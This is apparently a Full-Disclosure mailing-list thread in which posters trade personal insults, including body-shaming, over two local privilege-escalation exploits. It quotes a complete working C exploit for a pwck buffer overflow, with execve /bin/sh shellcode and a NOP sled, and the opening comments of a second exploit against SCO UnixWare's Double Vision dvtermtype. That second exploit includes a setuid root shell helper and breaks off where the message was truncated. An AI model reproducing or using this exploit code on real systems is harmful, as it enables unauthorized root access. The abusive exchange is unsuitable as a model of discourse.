Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)

[Day Jay <d4yj4y () yahoo com>]

I advise everyone to check out o'great Steve's site
and I have never seen such a celebration of mediocrity
and unutilized "knowledge" anywhere else in my life.
If I was even convinced of 1% of what skills he claims
to have, then there would be much more under that
fatman's belt.

oh, what I won't tell you is what makes me so great.
Wish I could, but I would never give you that time of
day. Sorry.

Just because you met fat Steve and he was nice,
doesn't make him special at all. You should get out
more and meet more people-that's the only advice I
could give you.

Let's keep the ass-kissing to a min. pls kthxbye


--- tuytumadre () att net wrote:

> Day jay, you may find it fun to criticize those
> recognized by Microsoft, but let me remind you that
> Steve has done more to help computer security then
> you will ever dream of accomplishing. He has
> forgotten more about computers then you will ever
> learn. I have met Steve, and he is a very nice man.
>
> Steve is a very successful person, contrary to your
> opinion of the alternative. I am surprised that
> people still hold you in any form of regard, after
> you acting like a complete asshole during your dumb
> shellcode-masked backdoor incident. However, I do
> not know enough about you to categorize you as a
> jerk. What do you do for a living? What makes you so
> special that you can criticize a successful,
> intellegent man for your personal satisfaction, or
> are you just a hypocrite? Tell me, oh "1337" one.
>
> Paul
> -------------- Original message from Day Jay
> <d4yj4y () yahoo com>: -------------- 
>
>
> > We all saw how short the code was I had for that
> pwck 
> > buffer overflow exploit. He also hardcodes the
> stack 
> > pointer, hahah. 
> >
> > ----------MINE----------------- 
> > #include 
> > char shellcode[] = 
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
> >
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
> >
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
> > "\x68"; 
> > unsigned long sp(void) 
> > { __asm__("movl %esp, %eax");} 
> > int main(int argc, char *argv[]) 
> > { 
> > int i, offset; 
> > long esp, ret, *addr_ptr; 
> > char *buffer, *ptr; 
> > offset = 1700; //the offset I first found worked 
> > esp = sp(); 
> > ret = esp - offset; 
> > buffer = malloc(2200); 
> > ptr = buffer; 
> > addr_ptr = (long *) ptr; 
> > for(i=0; i < 2200; i+=4) 
> > { *(addr_ptr++) = ret; } 
> > for(i=0; i < 1000; i++) 
> > { buffer[i] = '\x90'; } 
> > ptr = buffer + 200; 
> > for(i=0; i < strlen(shellcode); i++) 
> > { *(ptr++) = shellcode[i]; } 
> > buffer[2200-1] = 0; 
> > printf("d4yj4y fscked j00r mom!\n"); sleep(2); 
> > execl("/usr/sbin/pwck", "pwck", buffer, 0); 
> > free(buffer); 
> > return 0; 
> > } 
> > ------------------HIS-------------- 
> >
> > I have a feeling Steve was just mad mine was so
> short 
> > compared to his, lol 
> >
> > THIS IS HIS LOCAL ROOT EXPLOIT: 
> > /* 
> > * dvexploit.c 
> > * 
> > * written by : Stephen J. Friedl 
> > * Software Consultant 
> > * 2000-06-24 
> > * steve unixwiz net 
> > * 
> > * This program exploits the "Double Vision" system
> on 
> > SCO 
> > * Unixware 7.1.0 via a buffer overflow on the 
> > "dvtermtype" 
> > * program. Double Vision is like a "pcAnywhere for
>
> > UNIX", 
> > * but quite a few programs in this distribution
> are 
> > setuid 
> > * root. The problem is that these programs were
> not 
> > written 
> > * with security in mind, and it's not clear that
> they 
> > even 
> > * need to be setuid root. 
> > * 
> > * This particular program exploits "dvtermtype" by
>
> > passing a 
> > * very long second parameter that overflows some 
> > internal 
> > * buffer. This buffer is filled with a predicted 
> > address 
> > * of the shellcode, and the shellcode itself is 
> > stored in 
> > * a very long environment variable. This approach 
> > makes 
> > * the shellcode much easier to find. 
> > * 
> > * This shellcode was based directly on the great
> work 
> > of 
> > * Brock Tellier (btellier usa net), who seems to 
> > spend a lot 
> > * of time within with various SCO UNIX release. 
> > Thanks! 
> > * 
> > * This shellcode runs /tmp/ui, which should be
> this 
> > simple 
> > * program: 
> > * 
> > * $ cd /tmp 
> > * $ cat ui.c 
> > * int main() { setreuid(0,0); system("/bin/sh"); 
> > return 0; } 
> > * $ cc ui.c -o ui 
> > * 
> > * Brock's original work compiled this
> automatically, 
> > but I 
> > * prefer to do it by hand. A better approach is to
> do 
> > the 
> > * setreuid() in the shellcode and call /bin/sh 
> > directly. 
> > * Maybe another day. 
> > * 
> > * BUILD/TEST ENVIRONMENT 
> > * ---------------------- 
> > * 
> > * $ cc -v 
> > * UX:cc: INFO: Optimizing C Compilation System
> (CCS) 
> > 3.2 03/03/99 (CA-unk_voyager5) 
> > * 
> > * $ uname -a 
> > * UnixWare foo 5 7.1.0 i386 x86at SCO UNIX_SVR5 
> > * 
> > * from /usr/lib/dv/README 
> > * 
> > * DoubleVision for Character Terminals Release 3.0
>
> > * Last Update: December 7, 1999 
> > * 
> > * TUNING 
> > * ------ 
> > * 
> > * The default parameters to this program work on
> the 
> > versions mentioned 
> > * above, but for variants some tuning might be 
> > required. There are three 
> > * parameters that guide this program's operation: 
> > * 
> > * -a retaddr set the "return" address to the given
>
> > hex value, 
> > * which is the address where we expect to find the
>
> > * exploit code in the environment. The environment
>
> > * is at a relatively fixed location just below 
> > * 0x80000000, so getting "close" is usually 
> > sufficient. 
> > * Note that this address cannot have any zero
> bytes 
> > * in it! We believe that the target code has
> enough 
> > * padding NOP values to make it an easy target. 
> > * 
> > * -r retlen length of the overflowed "return
> address" 
> > buffer, 
> > * which is filled in with the address provided 
> > above. 
> > * Default = 2k, max = 5k. 
> > * 
> > * -l n slightly shift the alignment of the return 
> > address 
> > * buffer by 1, 2 or 3 in case the buffer that's 
> > being 
> > * overflowed. 
> > */ 
=== message truncated ===>
_______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
http://secunia.com/


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/